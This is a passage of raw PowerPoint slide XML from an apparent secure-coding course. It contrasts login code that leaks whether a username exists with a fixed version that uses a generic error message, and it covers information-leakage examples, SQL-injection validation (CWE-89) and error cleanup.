                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 7        {</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 8           print </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Login Successful"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 9        }</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10        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>else</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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11        {</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12           print </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Login Failed - incorrect password"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>13        }</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14     }</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15     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>else</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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16     {</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17        print </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Login Failed - unknown username"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>18     }</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-797021" y="2620272"/>
              <a:ext cx="4055853"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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180651" y="5441755"/>
            <a:ext cx="8153400" cy="914400"/>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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned.</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47658"/>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Secure Coding …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="251520" y="1272867"/>
            <a:ext cx="8153400" cy="4535316"/>
            <a:chOff x="499158" y="592344"/>
            <a:chExt cx="8153400" cy="4055855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="499158" y="592344"/>
              <a:ext cx="8153400" cy="4055855"/>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400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>username = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>param</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>('username');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 2     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>password = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>param</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>('password');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $result = 0;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 6     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>IsValidUsername</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($username) == 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 7     {</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 8        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>IsValidPassword</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($username, $password) == 1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 9        {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10           $result = 1;</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11           print </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Login Successful"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>12        }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>13     }</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>14</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>15     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($result != </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>16     {</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>17        print </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"Login </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Failed - incorrect username or </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>password"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>18     }</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-797021" y="2620272"/>
              <a:ext cx="4055853"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4289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Information Leakage - Discussion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1276795"/>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Is the following an example of information leakage or not?</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User account does not have sufficient funds to perform this transaction.  Minimum required balance is $5,000.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="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User password must be a minimum of 8 characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="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Failed validation – username must not contain the characters &lt; &gt; ‘ “ ( ) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-U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4590" y="373047"/>
            <a:ext cx="853703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200" dirty="0" smtClean="0"/>
              <a:t>Data Validation Words to Live By: #1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Horizontal Scroll 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162064" y="900948"/>
            <a:ext cx="54102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Validate data before use in SQL Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1280474"/>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CWE-89 : Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)</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The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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0" y="420983"/>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Error Handling Words to Live By: #2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Horizontal Scroll 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="401995" y="1238228"/>
            <a:ext cx="6400800" cy="1033272"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="40000"/>
              <a:lumOff val="6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dirty="0" smtClean="0"/>
              <a:t>Remember to cleanup completely in an error condition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
